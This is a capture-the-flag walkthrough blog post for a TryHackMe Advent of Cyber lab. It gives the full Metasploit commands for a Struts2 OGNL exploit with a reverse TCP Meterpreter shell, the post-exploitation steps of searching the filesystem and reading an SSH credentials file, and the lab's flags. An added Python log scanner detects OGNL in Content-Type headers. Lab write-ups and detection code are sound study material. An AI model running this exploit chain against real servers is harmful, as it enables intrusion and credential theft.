
Advent of Cyber Day 10 Metasploit-a-ho-ho-ho

Ludovic COULON
May 8th, 2020 · 1 min read

TryHackMe | Advent of Cyber

Hi Lindsey here. I’ve been a great Elf all year, but there was one incident and now I think I’m on Santa’s naughty list.

What? You didn’t think us elves got presents too? Well we do and we get first pick of the pressies!

Can you help me hack into Santa’s system that keeps track of the naughty and nice people to see if I am on it?

blog_image

Check out the blog post shown above to help you on this task.

Setup

The title of this box mentions “Struts”, so I searched the Metasploit framework for Struts exploits and, spoiler alert, there is one.

blog_image

Now that we have found the exploit, let’s use it!

use exploit/multi/http/struts2_content_type_ognl

Now set the correct host, port and target path for the exploit:

set RHOSTS 10.10.21.228 # IP of the target box
set RPORT 80 # There is no SSL (HTTPS), so plain HTTP on port 80
set TARGETURI /showcase.action # The path to a Struts application action (default path)

Now the fun part: the reverse TCP Meterpreter payload :)

use linux/x86/meterpreter/reverse_tcp
set LHOST IP # IP of your Kali machine (the OpenVPN address)
set LPORT 4444 # Any free port works here

After that configuration you need to go back to the previous exploit (struts2), attach the payload to it and run it:

use multi/http/struts2_content_type_ognl
set PAYLOAD linux/x86/meterpreter/reverse_tcp # Link the reverse TCP payload to the Struts exploit
exploit
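From the defender’s side, here is an added example (not part of the original writeup) of how this exploit shows up in traffic: the struts2_content_type_ognl module injects an OGNL expression through the Content-Type request header, so a log scanner can flag Content-Type values that contain expression openers, OGNL context references, or that are simply not a media type at all. The access-log format and the sample lines are assumed and constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Hypothetical access-log format, assumed for this example: the reverse proxy
# logs client IP, request line, status and the Content-Type request header as ct="...".
LOG_LINE = re.compile(r'^(?P<client>\S+) "(?P<request>[^"]*)" (?P<status>\d{3}) ct="(?P<ct>.*)"$')

OGNL_OPENER = re.compile(r"[%$]\{")          # "%{" or "${" opens an OGNL expression
OGNL_CONTEXT_REF = re.compile(r"#[A-Za-z_]")  # "#name" references OGNL context variables
MAX_SANE_LENGTH = 256                         # no legitimate media type declaration is this long
# type/subtype followed by optional ";param=value" pairs (value may be quoted)
VALID_MEDIA_TYPE = re.compile(r'^[\w.+-]+/[\w.+-]+(\s*;\s*[\w.-]+=("[^"]*"|[^;\s]+))*\s*$')


@dataclass
class Finding:
    line_no: int
    client: str
    request: str
    reason: str


def classify_content_type(value: str) -> Optional[str]:
    """Return why a Content-Type value looks like OGNL injection, or None if it looks benign."""
    if OGNL_OPENER.search(value):
        return "OGNL expression opener in Content-Type"
    if OGNL_CONTEXT_REF.search(value):
        return "OGNL context reference (#name) in Content-Type"
    if len(value) > MAX_SANE_LENGTH:
        return f"Content-Type longer than {MAX_SANE_LENGTH} bytes"
    if not VALID_MEDIA_TYPE.match(value):
        return "Content-Type is not a well-formed media type"
    return None


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Run the Content-Type checks over every parseable log line; unparseable lines are skipped."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        m = LOG_LINE.match(line.rstrip("\n"))
        if not m:
            continue
        reason = classify_content_type(m.group("ct"))
        if reason:
            findings.append(Finding(line_no, m.group("client"), m.group("request"), reason))
    return findings


# Constructed sample log lines (not real traffic): a benign multipart upload,
# a request whose Content-Type is an OGNL expression, and a plain GET.
SAMPLE_LOG = [
    '10.0.0.5 "POST /showcase.action HTTP/1.1" 200 ct="multipart/form-data; boundary=----abc123"',
    '10.0.0.9 "GET /showcase.action HTTP/1.1" 200 ct="%{(#_=\'multipart/form-data\').(#probe=1)}"',
    '10.0.0.7 "GET /index.action HTTP/1.1" 200 ct="text/plain"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client} {f.request}: {f.reason}")
```

On the constructed sample only the second line is reported; the same checks can be applied at a WAF or reverse proxy before the request reaches Struts.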

1. Compromise the web server using Metasploit. What is flag1?

The question gives us the name of the flag, so let’s search the filesystem for it!

meterpreter > shell
Process 63 created.
Channel 6 created.
find / | grep -i "flag1"
/usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt
^C
Terminate channel 6? [y/N] y
meterpreter > cat /usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt
THM{3ad96bb13ec963a5ca4cb99302b37e12}
THM{3ad96bb13ec963a5ca4cb99302b37e12} # flag

2. Now you’ve compromised the web server, get onto the main system. What is Santa’s SSH password?

The question mentions the name ‘santa’, so let’s see which users have a directory under /home:

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2019-12-08 16:12:45 -0500 santa

meterpreter > cd santa
meterpreter > ls
Listing: /home/santa
====================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 30 fil 2019-12-08 16:12:44 -0500 ssh-creds.txt

meterpreter > cat ssh-creds.txt
santa:rudolphrednosedreindeer
rudolphrednosedreindeer # flag

3. Who is on line 148 of the naughty list?

Now that we have the SSH credentials for santa’s account, let’s use them!

ssh santa@10.10.21.228
password: rudolphrednosedreindeer

A trick from “How to “grep” out specific line ranges of a file”: sed can print a single line by deleting every line except the one you want (the `!d` below means “delete all lines that are not 148”).

[santa@ip-10-10-21-228 ~]$ sed '148!d' naughty_list.txt
Melisa Vanhoose

4. Who is on line 52 of the nice list?

[santa@ip-10-10-21-228 ~]$ sed '52!d' nice_list.txt
Lindsey Gaffney

© 2020 Ludovic COULON